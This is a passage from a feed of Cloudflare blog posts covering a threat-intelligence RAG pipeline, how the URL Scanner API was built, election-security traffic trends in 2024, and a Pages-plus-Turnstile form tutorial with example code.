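    for (const msg of batch.messages) {
      const { caseId, fileId, content } = msg.body;
      // Embed the edited file content with Workers AI...
      const { data } = await env.AI.run("@cf/baai/bge-base-en-v1.5", { text: [content] });
      // ...and upsert into Vectorize, carrying the case/file reference as metadata.
      await env.INDEX.upsert([{ id: fileId, values: data[0], metadata: { caseId } }]);
      msg.ack();
    }
  },
};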

Given how easy it is to set up Workers AI, we took the final step of implementing a full Retrieval Augmented Generation (RAG) pipeline that allows analysts to ask questions about our previous analysis. Each question undergoes the same process as the content we index: we pull out any indicators of compromise and embed the question into a vector, then use both to search our indexes and Vectorize, respectively, and retrieve the most relevant results for the request. Lastly, we send those results, along with the question, to a text-generation model using Workers AI, which returns a response to our analysts.
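
The retrieval side might look like the following sketch, reusing the Env bindings from the consumer above (the query options and model names are again illustrative):

async function answer(question: string, env: Env): Promise<string> {
  // Embed the question the same way the case files were embedded...
  const { data } = await env.AI.run("@cf/baai/bge-base-en-v1.5", { text: [question] });
  // ...retrieve the most relevant prior analysis from Vectorize...
  const results = await env.INDEX.query(data[0], { topK: 5, returnMetadata: true });
  const refs = results.matches.map((m) => JSON.stringify(m.metadata)).join("\n");
  // ...and hand the context plus the question to a text-generation model.
  const out = await env.AI.run("@cf/meta/llama-2-7b-chat-int8", {
    messages: [
      { role: "system", content: `Answer using these case references:\n${refs}` },
      { role: "user", content: question },
    ],
  });
  return (out as { response?: string }).response ?? "";
}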

Using RFIs and PIRs

Imagine submitting an RFI for “Passive DNS Resolution – IOCs” and receiving real-time updates directly within the PIR, guiding your next steps.

Our workflow ensures that the intelligence you need is not only obtained but also used optimally. This approach empowers your team to tailor your intelligence gathering, strengthening your cybersecurity strategy and security posture.

Our mission for Cloudforce One is to equip organizations with the tools they need to stay one step ahead in the rapidly changing world of cybersecurity. The addition of RFIs and PIRs marks another milestone in this journey, empowering users with enhanced threat intelligence capabilities.

Getting started

Cloudforce One customers can already see the PIR and RFI Dashboard in their Security Center, and they can also use the API if they prefer that option. Click to see more documentation about our RFI and our PIR APIs.

If you’re looking to try out the new RFI and PIR capabilities within the Security Center, contact your Cloudflare account team or fill out this form and someone will be in touch. Finally, if you’re interested in joining the Cloudflare team, check out our open job postings here.

Cloudflare’s URL Scanner, new features, and the story of how we built it

Post Syndicated from Sofia Cardita original https://blog.cloudflare.com/building-urlscanner


Today, we’re excited to talk about URL Scanner, a tool that helps everyone from security teams to everyday users to detect and safeguard against malicious websites by scanning and analyzing them. URL Scanner has executed almost a million scans since its launch last March on Cloudflare Radar, driving us to continuously innovate and enhance its capabilities. Since that time, we have introduced unlisted scans, detailed malicious verdicts, enriched search functionality, and now, integration with Security Center and an official API, all built upon the robust foundation of Cloudflare Workers, Durable Objects, and the Browser Rendering API.

Integration with the Security Center in the Cloudflare Dashboard

Security Center is the single place in the Cloudflare Dashboard to map your attack surface, identify potential security risks, and mitigate risks with a few clicks. Its users can now access the URL scanner directly from the Investigate Portal, enhancing their cybersecurity workflow. These scans will be unlisted by default, ensuring privacy while facilitating a deep dive into website security. Users will be able to see their historic scans and access the related reports when they need to, and they will benefit from automatic screenshots for multiple screen sizes, enriching the context of each scan.

Customers with Cloudflare dashboard access will enjoy higher API limits and faster response times, crucial for agile security operations. Integration with internal workflows becomes seamless, allowing for sophisticated network and user protection strategies.

Security Center in the Cloudflare Dashboard

Unlocking the potential of the URL Scanner API

The URL Scanner API is a powerful asset for developers, enabling custom scans to detect phishing or malware risks, analyze website technologies, and much more. With new features like custom HTTP headers and multi-device screenshots, developers gain a comprehensive toolkit for thorough website assessment.

Submitting a scan request

Using the API, here’s the simplest way to submit a scan request:

curl --request POST \
	--url https://api.cloudflare.com/client/v4/accounts/<accountId>/urlscanner/scan \
	--header 'Content-Type: application/json' \
	--header "Authorization: Bearer <API_TOKEN>" \
	--data '{
		"url": "https://www.cloudflare.com"
	}'

New features include the option to set custom HTTP headers, like User-Agent and Authorization, request multiple target device screenshots, like mobile and desktop, as well as set the visibility level to “unlisted”. This essentially marks the scan as private and was often requested by developers who wanted to keep their investigations confidential. Public scans, on the other hand, can be found by anyone through search and are useful to share results with the wider community. You can find more details in our developer documentation.

Exploring the scan results

Scan results for www.cloudflare.com on Cloudflare Radar

Once a scan concludes, fetch the final report and the full network log. Recently added features include the `verdict` property, indicating the site’s malicious status, and the `securityViolations` section detailing CSP or SRI policy breaches — as a developer, you can also scan your own website and see our recommendations. Expect improvements in verdict accuracy over time, as this is an area we’re focusing on.

Enhanced search functionality

Developers can now search scans by hostname, a specific URL, or even any URL the page connected to during the scan. This allows you, for example, to search for websites that use a JavaScript library named jquery.min.js (‘?path=jquery.min.js’). Future plans include additional features like searching by IP address, ASN, and malicious website categorisation.

The URL Scanner can be used for a diverse range of applications. These include capturing a website’s evolving state over time (such as tracking changes to the front page of an online newspaper), analyzing technologies employed by a website, preemptively assessing potential risks (as when scrutinizing shortened URLs), and supporting the investigation of persistent cybersecurity threats (such as identifying affected websites hosting a malicious JavaScript file).

How we built the URL Scanner API

In recounting the process of developing the URL Scanner, we aim to showcase the potential and versatility of Cloudflare Workers as a platform. This story is more than a technical journey; it is a testament to the capabilities inherent in our platform’s suite of APIs. By dogfooding our own technology, we not only demonstrate confidence in its robustness but also encourage developers to harness the same capabilities for building sophisticated applications. The URL Scanner exemplifies how Cloudflare Workers, Durable Objects, and the Browser Rendering API seamlessly integrate.

High level overview of the Cloudflare URL Scanner technology stack

As seen above, Cloudflare’s runtime infrastructure is the foundation the system runs on. Cloudflare Workers serves the public API, Durable Objects handles orchestration, R2 acts as the primary storage solution, and Queues efficiently handles batch operations, all at the edge. However, what truly enables the URL Scanner’s capabilities is the Browser Rendering API. It’s what initially allowed us to release in such a short time frame, since we didn’t have to build and manage an entire fleet of Chrome browsers from scratch. We simply request a browser, and then using the well known Puppeteer library, instruct it to fetch the webpage and process it in the way we want. This API is at the heart of the entire system.

Scanning a website

The entire process of scanning a website can be split into four phases:

  1. Queue a scan
  2. Browse to the website and compile initial report
  3. Post-process: compile additional information and build final report
  4. Store final report, ready for serving and searching

In short, we create a Durable Object, the Scanner, unique to each scan, which is responsible for orchestrating the scan from start to finish. Since we want to respond immediately to the user, we save the scan to the Durable Object’s transactional Key-Value storage, and schedule an alarm so we can perform the scan asynchronously a second later. We then respond to the user, informing them that the scan request was accepted.
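
In code, that accept-then-defer pattern looks roughly like this (a sketch; the class shape and stored fields are illustrative):

export class Scanner implements DurableObject {
	constructor(private state: DurableObjectState) {}

	async fetch(request: Request): Promise<Response> {
		const { url } = await request.json<{ url: string }>()
		// Save the pending scan in transactional storage...
		await this.state.storage.put("scan", { url, status: "queued" })
		// ...schedule the real work for one second from now...
		await this.state.storage.setAlarm(Date.now() + 1000)
		// ...and respond to the user immediately.
		return Response.json({ accepted: true })
	}

	async alarm(): Promise<void> {
		const scan = await this.state.storage.get<{ url: string }>("scan")
		if (!scan) return
		// Phase 2 starts here: request a free browser from the Browser Pool
		// and hand scan.url to its Browser Controller.
	}
}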

When the Scanner’s alarm triggers, we enter the second phase:

There are 3 components at work in this phase, the Scanner, the Browser Pool and the Browser Controller, all Durable Objects.

In the initial release, we would launch a brand-new browser for each new scan. However, this operation took time and was inefficient, so after review, we decided to reuse browsers across multiple scans. This is why we introduced both the Browser Pool and the Browser Controller components. The Browser Pool keeps track of which browsers we have open, when they last pinged the browser pool (so it knows they’re alive), and whether they’re free to accept a new scan. The Browser Controller is responsible for keeping the browser instance alive once it’s launched, and for orchestrating (ahem, puppeteering) the entire browsing session. Here’s a simplified version of our Browser Controller code:

export class BrowserController implements DurableObject {
	//[..]
	private async handleNewScan(url: string) {
		if (!this.browser) {
			// Launch browser: 1st request to durable object
			this.browser = await puppeteer.launch(this.env.BROWSER)
			await this.state.storage.setAlarm(Date.now() + 5 * 1000)
		}
		// Open new page and navigate to url
		const page = await this.browser.newPage()
		await page.goto(url, { waitUntil: 'networkidle2', timeout: 5000, })

		// Capture DOM
		const dom = await page.content()

		// Clean up
		await page.close()

		return {
			dom: dom,
		}
	}

	async alarm() {
		if (!this.browser) {
			return
		}
		await this.browser.version() // stop websocket connection to Chrome from going idle
		
		// ping browser pool, let it know we're alive
		
		// Keep durable object alive
		await this.state.storage.setAlarm(Date.now() + 5 * 1000)
	}
}

Launching a browser (Step 6) and maintaining a connection to it is abstracted away from us thanks to the Browser Rendering API. This API is responsible for all the infrastructure required to maintain a fleet of Chrome browsers, and led to a much quicker development and release of the URL Scanner. It also allowed us to use a well-known library, Puppeteer, to communicate with Google Chrome via the DevTools protocol.

The initial report is made up of the network log of all requests, captured in HAR (HTTP Archive) format. HAR files, essentially JSON files, provide a detailed record of all interactions between a web browser and a website. As an established standard in the industry, HAR files can be easily shared and analyzed using specialized tools. In addition to this network log, we augment our dataset with an array of other metadata, including base64-encoded screenshots which provide a snapshot of the website at the moment of the scan.

Having this data, we transition to phase 3, where the Scanner Durable Object initiates a series of interactions with a few other Cloudflare APIs in order to collect additional information, like running a phishing scanner over the web page’s Document Object Model (DOM), fetching DNS records, and extracting information about categories and Radar rank associated with the main hostname.

This process ensures that the final report is enriched with insights coming from different sources, making the URL Scanner more efficient in assessing websites. Once all the necessary information is collected, we compile the final report and store it as a JSON file within R2, Cloudflare’s object storage solution. To empower users with efficient scan searches, we use Postgres.

While the initial approach involved sending each completed scan promptly to the core API for immediate storage in Postgres, we realized that, as the rate of scans grew, a more efficient strategy would be to batch those operations, and for that, we use Worker Queues:

This allows us to better manage the write load on Postgres. We wanted scans available as soon as possible to those who requested them, but it’s ok if they’re only available in search results at a slightly later point in time (seconds to minutes, depending on load).

In short, Durable Objects together with the Browser Rendering API power the entire scanning process. Once that’s finished, the Cloudflare Worker serving the API will simply fetch it from R2 by ID. All together, Workers, Durable Objects, and R2 scale seamlessly and will allow us to grow as demand evolves.

Last but not least

While we’ve extensively covered the URL scanning workflow, we’ve yet to delve into the construction of the API worker itself. Developed in TypeScript, it uses itty-router-openapi, a JavaScript router with OpenAPI 3 schema generation and validation, originally built for Radar, but improving ever since with contributions from the community. Here’s a quick example of how to set up an endpoint, with input validation built in:

import { z } from 'zod'
import { OpenAPIRoute, OpenAPIRouter, Uuid } from '@cloudflare/itty-router-openapi'

export class ScanMetadataCreate extends OpenAPIRoute {
  static schema = {
    tags: ['Scans'],
    summary: 'Create Scan metadata',
    requestBody: {
      scan_id: Uuid,
      url: z.string().url(),
      destination_ip: z.string().ip(),
      timestamp: z.string().datetime(),
      console_logs: [z.string()],
    },
  }

  async handle(
    request: Request,
    env: any,
    context: any,
    data: any,
  ) {
    // Retrieve validated scan
    const newScanMetadata = data.body

    // Insert the scan

    // Return scan as json
    return newScanMetadata
  }
}


const router = OpenAPIRouter()
router.post('/scan/metadata/', ScanMetadataCreate)

// 404 for everything else
router.all('*', () => new Response('Not Found.', { status: 404 }))

export default {
  fetch: router.handle,
}

In the example above, the ScanMetadataCreate endpoint will make sure to validate the incoming POST data to match the defined schema before calling the ‘async handle(request,env,context,data)’ function. This way you can be sure that if your code is called, the data argument will always be validated and formatted.

You can learn more about the project on its GitHub page.

Future plans and new features

Looking ahead, we’re committed to further elevating the URL Scanner’s capabilities. Key upcoming features include geographic scans, where users can customize the location that the scan is done from, providing critical insights into regional security threats and content compliance; expanded scan details, including more comprehensive headers and security details; and continuous performance improvements and optimisations, so we can deliver faster scan results.

The evolution of the URL Scanner is a reflection of our commitment to Internet safety and innovation. Whether you’re a developer, a security professional, or simply invested in the safety of the digital landscape, the URL Scanner API offers a comprehensive suite of tools to enhance your efforts. Explore the new features today, and join us in shaping a safer Internet for everyone.

Remember, while Security Center’s new capabilities offer advanced tools for URL Scanning for Cloudflare’s existing customers, the URL Scanner remains accessible for basic scans to the public on Cloudflare Radar, ensuring our technology benefits a broad audience.

If you’re considering a new career direction, check out our open positions. We’re looking for individuals who want to help make the Internet better; learn more about our mission here.

Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season

Post Syndicated from Jocelyn Woolbright original https://blog.cloudflare.com/protecting-global-democracy-against-threats-from-emerging-technology


In 2024, more than 80 national elections are slated to occur, directly impacting approximately 4.2 billion individuals in places such as Indonesia, the United States, India, the European Union, and more. This marks the most extensive election cycle worldwide until the year 2048. Elections are a cornerstone of democracy, providing citizens with the means to shape their government, hold leaders accountable, and participate in the political process.

At Cloudflare, we’ve been supporting state and local governments that run elections for free for the last seven years. As we look at the upcoming elections around the world, we are reminded how important our services are in keeping information related to elections reliable and secure from those looking to disrupt these processes. Unfortunately, the problems that election officials face in keeping elections secure have only become more complicated, requiring information sharing, capacity building, and joint efforts to safeguard democratic processes.

At Cloudflare, we support a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process. With Cloudflare Impact projects, we have found a way to protect a range of stakeholders who play an important role in the election process and better prepare them for the unexpected. As we have grown our various Impact projects to protect more than 2,900 domains, we have learned how best to protect vulnerable groups online.

During Security Week, we want to provide a look at how we are preparing groups that work in elections around the world for 2024, as well as exploring emerging threat trends.

A look at the year ahead

State and local governments play a critical role in various aspects of the election process. From voter registration to candidate filing, polling place setup, distribution of ballots, tabulations of voters, and reporting of election results, they ensure that elections are conducted fairly, securely, and efficiently.

If we have learned anything from the last seven years, it is that election officials have even more on their plate when it comes to conducting free and fair elections. Countries conducting elections this year are likely to face a complicated array of threats, from voter manipulation to physical violence. Unfortunately, in many countries, people have been blamed for election results that displeased certain politicians and constituents, and numerous election officials have encountered death threats, online harassment, and mistreatment. In April 2023, the Brennan Center found that 45% of local election officials said they fear for the safety of their colleagues.

Safeguarding online infrastructure, securing voter registration systems, ensuring the integrity of election-related information, and planning effective incident response are all necessary as online threats grow more and more sophisticated. For example, in the three months leading up to the 2022 US midterm elections, Cloudflare prevented around 150,000 phishing emails targeting campaign officials.

How we use our services to promote free and fair elections

The core principle driving our work in the election space is the idea that access to accurate voting information, as provided by state and local governments, is fundamental to the proper functioning of democracy. We see ourselves as one piece of a larger puzzle when it comes to safeguarding elections.

Protecting election entities is an enormous task, and there is strength in partnerships that provide a broad range of roles and expertise. We have seen groups such as the Cybersecurity and Infrastructure Security Agency increase their role in boosting election security efforts over the last few years. There have been partnerships between governments, organizations, and private companies assisting election officials with the tools and expertise on the best ways to secure the democratic process.

In 2020, we partnered with the International Foundation for Electoral Systems to find a way to expand our protections to election management bodies outside the United States. In our partnership, we have been able to provide our Enterprise-level services to six election management bodies, including the Central Election Commission of Kosovo, State Election Commission of North Macedonia, and many local election bodies in Canada.

“Cloudflare is a technology enabler for the State Election Committee (SEC) in North Macedonia, and its tools help us ensure that early election results will be accessible to the general population, thus promoting visibility and transparency.”
– Vladislav Bidikov, Cybersecurity Task Force Member, State Election Commission of North Macedonia        

Internet trends during elections

Looking at Internet trends during elections, we have seen in several countries that Internet traffic typically drops during the day, when people are going to the polling booths. That was the case in France and Brazil in 2022, for example. After the polling booths close, traffic usually increases, when citizens are looking for results — a spotlight also shared with the traditional TV channels.

Indonesia, a country with more than 200 million voters (and a population of 275 million) and over 17,000 islands, held general elections on Wednesday, February 14. On that day, daily traffic dropped 5% compared with the previous week. Hourly traffic during the day dropped as much as 15% between 08:00 and 13:00 local time (Western Indonesia time, where most of the population lives), when polling stations were open. Traffic was lower than in the previous week during that day, and only picked up on the following day.

On the other hand, mobile device usage was at its highest point of 2024 to date on February 14, representing 77% of all requests from the country.

Pakistan election day Internet outage

In Pakistan, general elections were held on February 8. During this time, our data shows an outage that started around 02:00 UTC, recovering after 15:00. The Internet shutdown targeted mobile networks and was criticized by Amnesty International.

The Telenor (AS24499), Jazz (AS45669), and Zong (AS59257) mobile networks were impacted. For example, here is a view of the Telenor network:

In addition, social media platform X experienced a national-scale disruption following protests ignited by allegations of vote rigging in the general elections. Complete Internet blackouts represent the most severe type of Internet shutdown, but limitations on the usage of social media and messaging applications, especially during elections, also pose large obstacles. Many of these platforms have become indispensable for journalists and the media, serving as an important channel to connect with audiences, share and publicize their content, and securely communicate with their sources.

How do you prepare for the unexpected?

We have detailed our work during many elections in the United States, including how we protected the 2020 elections during times of uncertainty. As we prepare for the 2024 election, we will continue collaborating with experts on how best to provide our services. Last year, we also conducted an analysis of threats to election groups.

Early in 2024, we conducted webinars for state and local governments under the Athenian Project to share configuration recommendations and lessons learned during the 2020 and 2022 elections in the United States. We discussed topics such as preventing website defacement, and security checklist items such as checking domain and SSL certificate expiration dates. We are happy to report that many of these efforts to help state and local governments get the most out of our free Cloudflare products have been successful, with more than 92% of domains under the project using our proxy services to protect their websites. But we still have a long way to go: we found that 2FA adoption is still a problem, and we strongly encourage participants to enable it to protect accounts and sensitive information.

Ahead of the elections, we have also heard from larger election entities, such as secretaries of state, nonprofit organizations supporting election officials, and government agencies, who have reached out for our expertise on how to better support smaller election groups.

What keeps state and local election officials up at night?

To help prepare for the 2024 general elections in the United States, we wanted to learn more from state and local governments protected under the Athenian Project about what worries them in terms of online security threats. We sent out a brief survey to participants and found:

  • A majority of participants believe that the use of generative AI tools will have a significant impact on the 2024 election.
  • 80% of participants surveyed indicated that their team has experienced an email phishing attack in the last year.
  • Trust and reputation is the highest concern when it comes to a cyber attack, with election operations a close second.

We asked participants what they wished more people understood about their efforts in election security and reliability, and one county’s response stood out. To paraphrase, they said that election officials are also citizens and residents in their communities, and they strive to have safe, fair elections. We look forward to learning more about threats to these groups and how our products can help keep their internal data safe from attacks.

Super Tuesday

Super Tuesday in the United States involves several states, including California, Alabama, Iowa, and North Carolina, holding their primaries or caucuses on the same day, so it is often seen as a critical turning point in the presidential primary process.

On March 6, 2024, CISA reported there had been no credible digital threats to Super Tuesday, to the relief of many security experts. These comments came after Meta reported an outage that caused Facebook, Messenger, and Instagram to be inaccessible to many users in the United States.

During Super Tuesday, we had the opportunity to witness firsthand the benefits of a range of election groups having access to free cybersecurity services. We are happy to report that during this time, we did not see any major cyberattacks against these groups. As part of this, we want to share updated insights into the types of attacks that the election groups we protect face, with the hope of better securing them online.

Athenian Project

Under the Athenian Project, we protect more than 400 state and local government websites in 32 states that run elections. We identified 100 websites in the 16 states conducting elections on Super Tuesday and observed a considerable increase in traffic after Monday, March 4th.

When it comes to automated traffic to these websites, the figure below shows that traffic classified as bot traffic maintained a relatively steady pattern between February 26 and March 5. Bot traffic describes any non-human traffic to a website or an app, and it is important to note that not all bot traffic is malicious. Legitimate bot traffic includes activities like search engine indexing, while malicious bot traffic is designed to engage in fraudulent activities such as spamming, scraping content for unauthorized use, or launching distributed denial-of-service (DDoS) attacks.

As March 5th began, an increase in “human” traffic was clearly visible, with a significant increase starting at 05:00 EST and decreasing around 23:00. This is typical of what we see in the election space, as many people are visiting these websites to identify their polling place locations, or view up-to-date election results.

On Super Tuesday, March 5, 2024, Cloudflare mitigated over 18.9 million requests against state and local governments under the Athenian Project.

Cloudflare for Campaigns

In 2020, we partnered with Defending Digital Campaigns, a nonprofit organization dedicated to providing cyber security resources and assistance to political campaigns and committees in the United States. Through our partnership, we have been able to provide more than $3 million in Cloudflare products. For this analysis, we identified 49 websites protected by Cloudflare for Campaigns that are located in the states that conducted an election during Super Tuesday. In total, we protect 97 campaign websites and 27 political party websites.

Overall traffic to these websites remained fairly consistent through the latter half of February and into March, but started to grow the weekend ahead of Super Tuesday, as seen in the figure below. Peaks were seen at 23:00 EST on March 4 and 20:00 EST on March 5.

We’ve noticed that websites under Cloudflare for Campaigns experience low, constant bot traffic, although it increased slightly during the first days of March. But the figure below shows that the overall increase in traffic discussed above was driven by a significant increase in request traffic identified as coming from actual users (that is, “human”).

A majority of the traffic was to political parties protected under the project in these Super Tuesday states, with 53% of the traffic identified going to these party websites.

Project Galileo

Cloudflare protects more than 65 Internet properties in the United States that work on a range of topics related to voting rights and promoting free and fair elections. Super Tuesday brought a considerable traffic spike to these websites of 3.22M requests around 09:00 EST, roughly double the previous peak of 1.56M requests on February 20th at 11:00 EST.

This spike was determined to be user-driven (not bot) traffic and was caused by a single zone belonging to a nonpartisan nonprofit organization that provides online voter guides for every state, including voter registration forms. The organization has been protected under Project Galileo since 2017. Its request traffic increased 1360% between 07:00 and 09:00 EST. This is a clear example of the importance of access to cybersecurity tools in advance of a major event, as spikes in traffic can be unpredictable.

2024 and beyond

As we approach the 2024 election cycle, Cloudflare is ready to provide support to election officials, voting rights groups, political campaigns, and parties involved in elections.

With a year full of elections and given the global attention on election security, the engagement of seasoned professionals is essential to safeguard the democratic process. Through continued collaboration with stakeholders in the election space, we continuously develop strategies for effectively securing web infrastructure and internal teams. We remain committed to safeguarding resources throughout the voting process and fostering trust in democratic institutions around the world.

We want to ensure that all groups working to promote democracy around the world have the tools they need to stay secure online. If you work in the election space and need our help, please apply at https://www.cloudflare.com/election-security.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin

Post Syndicated from Sally Lee original https://blog.cloudflare.com/guide-to-cloudflare-pages-and-turnstile-plugin


Balancing developer velocity and security against bots is a constant challenge. Deploying your changes as quickly and easily as possible is essential to stay ahead of your (or your customers’) needs and wants. Ensuring your website is safe from malicious bots — without degrading user experience with alien hieroglyphics to decipher just to prove that you are a human — is no small feat. With Pages and Turnstile, we’ll walk you through just how easy it is to have the best of both worlds!

Cloudflare Pages offers a seamless platform for deploying and scaling your websites with ease. You can get started right away by configuring your website with a quick integration using your git provider, and you’ll be set up with unlimited requests, bandwidth, collaborators, and projects.

Cloudflare Turnstile is Cloudflare’s CAPTCHA alternative, where your users never have to solve another puzzle to get to your website: no more stop lights and fire hydrants. You can protect your site without putting your users through an annoying experience. If you are already using another CAPTCHA service, we have made it easy to migrate over to Turnstile with minimal effort. Check out the Turnstile documentation to get started.

Alright, what are we building?

In this tutorial, we’ll walk you through integrating Cloudflare Pages with Turnstile to secure your website against bots. You’ll learn how to deploy Pages, embed the Turnstile widget, validate the token on the server side, and monitor Turnstile analytics. Let’s build upon this tutorial from Cloudflare’s developer docs, which outlines how to create an HTML form with Pages and Functions. We’ll also show you how to secure it by integrating with Turnstile, complete with client-side rendering and server-side validation, using the Turnstile Pages Plugin!
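
To give a sense of how little server-side code this takes, here’s a minimal sketch of the validation middleware based on the plugin’s documented interface; the file path and literal secret are placeholders (in practice, store the secret as an environment binding):

// functions/api/_middleware.ts (path is illustrative)
import turnstilePlugin from "@cloudflare/pages-plugin-turnstile";

// The plugin intercepts the POST, validates the submitted Turnstile token
// against Cloudflare's siteverify endpoint, and only then runs your handler.
export const onRequestPost: PagesFunction = turnstilePlugin({
  secret: "<TURNSTILE_SECRET_KEY>",
});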

Step 1: Deploy your Pages

On the Cloudflare Dashboard, select your account and go to Workers & Pages to create a new Pages application with your git provider. Choose the repository where you cloned the tutorial project or any other repository that you want to use for this walkthrough.

The Build settings for this project are simple:

  • Framework preset: None
  • Build command: npm install @cloudflare/pages-plugin-turnstile
  • Build output directory: public

Once you select “Save and Deploy”, all the magic happens under the hood and voilà! The form is already deployed.

Step 2: Embed Turnstile widget

Now, let’s navigate to Turnstile and add the newly created Pages site.

Here are the widget configuration options:

  • Domain: All you need to do is add the domain for the Pages application. In this example, it’s “pages-turnstile-demo.pages.dev”. For each deployment, Pages generates a deployment specific preview subdomain. Turnstile covers all subdomains automatically, so your Turnstile widget will work as expected even in your previews. This is covered more extensively in our Turnstile domain management documentation.
  • Widget Mode: There are three widget modes you can choose from:
      • Managed: This is the recommended option, where Cloudflare decides when further validation through the checkbox interaction is required to confirm whether the user is a human or a bot. This is the mode we will use in this tutorial.
      • Non-interactive: This mode does not require the user to interact and check the box of the widget. It is a non-intrusive mode where the widget is still visible to users but requires no added step in the user experience.
      • Invisible: In this mode, the widget is not visible at all to users and runs in the background of your website.
  • Pre-Clearance setting: With a clearance cookie issued by the Turnstile widget, you can configure your website to verify every single request or once within a session. To learn more about implementing pre-clearance, check out this blog post.

Once you create your widget, you will be given a sitekey and a secret key. The sitekey is public and used to invoke the Turnstile widget on your site. The secret key should be stored safely for security purposes.

Let’s embed the widget above the Submit button. Your index.html should look like this:

<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<title>Cloudflare Pages | Form Demo</title>
		<meta name="theme-color" content="#d86300">
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<link rel="icon" type="image/png" href="https://www.cloudflare.com/favicon-128.png">
		<link rel="stylesheet" href="/index.css">
		<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>
	</head>
	<body>

		<main>
			<h1>Demo: Form Submission</h1>

			<blockquote>
				<p>This is a demonstration of Cloudflare Pages with Turnstile.</p>
				<p>Pages deployed a <code>/public</code> directory, containing an HTML document (this webpage) and a <code>/functions</code> directory, which contains the Cloudflare Workers code for the API endpoint this <code>&lt;form&gt;</code> references.</p>
				<p><b>NOTE:</b> On form submission, the API endpoint responds with a JSON representation of the data. The only JavaScript running in this example renders the Turnstile widget.</p>
			</blockquote>

			<form method="POST" action="/api/submit">
				<div class="input">
					<label for="name">Full Name</label>
					<input id="name" name="name" type="text" />
				</div>

				<div class="input">
					<label for="email">Email Address</label>
					<input id="email" name="email" type="email" />
				</div>

				<div class="input">
					<label for="referers">How did you hear about us?</label>
					<select id="referers" name="referers">
						<option hidden disabled selected value></option>
						<option value="Facebook">Facebook</option>
						<option value="Twitter">Twitter</option>
						<option value="Google">Google</option>
						<option value="Bing">Bing</option>
						<option value="Friends">Friends</option>
					</select>
				</div>

				<div class="checklist">
					<label>What are your favorite movies?</label>
					<ul>
						<li>
							<input id="m1" type="checkbox" name="movies" value="Space Jam" />
							<label for="m1">Space Jam</label>
						</li>
						<li>
							<input id="m2" type="checkbox" name="movies" value="Little Rascals" />
							<label for="m2">Little Rascals</label>
						</li>
						<li>
							<input id="m3" type="checkbox" name="movies" value="Frozen" />
							<label for="m3">Frozen</label>
						</li>
						<li>
							<input id="m4" type="checkbox" name="movies" value="Home Alone" />
							<label for="m4">Home Alone</label>
						</li>
					</ul>
				</div>
				<div id="turnstile-widget" style="padding-top: 20px;"></div>
				<button type="submit">Submit</button>
			</form>
		</main>
	<script>
	// This function is called when the Turnstile script is loaded and ready to be used.
	// The function name matches the "onload=..." parameter.
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
	</script>
	</body>
</html>

You can embed the Turnstile widget implicitly or explicitly. In this tutorial, we will explicitly embed the widget by injecting the JavaScript tag and related code, then specifying the placement of the widget.

<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>
<script>
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
</script>

Make sure that the div id you assign is the same as the id you specify in the turnstile.render call. In this case, let’s use “turnstile-widget”. Once that’s done, you should see the widget show up on your site!

<div id="turnstile-widget" style="padding-top: 20px;"></div>
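Per the Turnstile documentation, you can also render the widget implicitly: load api.js without the onload callback and the script automatically renders a widget inside any element carrying the cf-turnstile class. A minimal sketch using the same demo sitekey (explicit rendering, as above, gives you more control over when and where the widget appears):

<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
<div class="cf-turnstile" data-sitekey="0xAAAAAAAAAXAAAAAAAAAAAA" data-theme="light"></div>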

Step 3: Validate the token

Now that the Turnstile widget is rendered on the front end, let’s validate it on the server side and check out the Turnstile outcome. We need to make a call to the /siteverify API with the token in the submit function under ./functions/api/submit.js.

First, grab the token issued from Turnstile under cf-turnstile-response. Then, call the /siteverify API to ensure that the token is valid. In this tutorial, we’ll attach the Turnstile outcome to the response to verify everything is working well. You can decide on the expected behavior and where to direct the user based on the /siteverify response.

/**
 * POST /api/submit
 */

import turnstilePlugin from "@cloudflare/pages-plugin-turnstile";

// This is a demo secret key. In production, we recommend you store
// your secret key(s) safely.
const SECRET_KEY = '0x4AAAAAAASh4E5cwHGsTTePnwcPbnFru6Y';

export const onRequestPost = [
	turnstilePlugin({
		secret: SECRET_KEY,
	}),
	async (context) => {
		// The request has been validated as coming from a human
		const formData = await context.request.formData();

		// Collect the form fields, grouping repeated keys into arrays
		let outcome = {};
		for (let [key, value] of formData) {
			const tmp = outcome[key];
			if (tmp === undefined) {
				outcome[key] = value;
			} else {
				outcome[key] = [].concat(tmp, value);
			}
		}

		// Attach the Turnstile outcome to the response
		outcome["turnstile_outcome"] = context.data.turnstile;

		const pretty = JSON.stringify(outcome, null, 2);

		return new Response(pretty, {
			headers: {
				'Content-Type': 'application/json;charset=utf-8'
			}
		});
	}
];
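The plugin takes care of calling the /siteverify API for you and attaches the result to context.data.turnstile. If you ever need to validate a token by hand, a minimal sketch (using the SECRET_KEY defined above) looks like this; the cf-turnstile-response field name and the siteverify endpoint are part of Turnstile’s documented API, while the error handling here is illustrative:

export async function onRequestPost(context) {
	const formData = await context.request.formData();
	const token = formData.get('cf-turnstile-response');

	// Validate the token against the /siteverify API
	const result = await fetch('https://challenges.cloudflare.com/turnstile/v0/siteverify', {
		method: 'POST',
		body: new URLSearchParams({
			secret: SECRET_KEY,
			response: token,
			remoteip: context.request.headers.get('CF-Connecting-IP'),
		}),
	});

	const outcome = await result.json();
	if (!outcome.success) {
		return new Response('Turnstile validation failed', { status: 403 });
	}
	// ...process the form as above
}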

